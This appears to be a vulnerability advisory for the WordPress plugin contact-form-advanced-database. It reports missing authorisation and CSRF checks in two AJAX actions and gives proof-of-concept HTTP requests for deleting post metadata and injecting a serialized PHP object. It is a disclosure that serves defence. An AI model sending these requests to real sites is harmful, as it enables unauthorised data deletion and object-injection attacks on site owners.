The plugin does not have any authorisation as well as CSRF checks in its delete_cf7_data and export_cf7_data AJAX actions, available to any authenticated users, which could allow users with a role as low as subscriber to call them. The delete_cf7_data would lead to arbitrary metadata deletion, as well as PHP Object Injection if a suitable gadget chain is present in another plugin, as user data is passed to the maybe_unserialize() function without being first validated.
To delete the _edit_lock metadata of the post ID 18: POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 77 Connection: close Cookie: [any authenticated user] action=delete_cf7_data&data;%5b0%5d%5bid%5d=18&data;%5b0%5d%5bkey%5d=_edit_lock To prove the object injection, we inserted a new class in the plugin file: # class InjectionPoint{public function __destruct(){die(“OBJECT INJECTION”);}} POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 103 Connection: close Cookie: [any authenticated user] action=delete_cf7_data&data;[0][id]=1data[0][key]=test&data;[0][val]=TzoxNDoiSW5qZWN0aW9uUG9pbnQiOjA6e30=
CPE | Name | Operator | Version |
---|---|---|---|
contact-form-advanced-database | eq | * |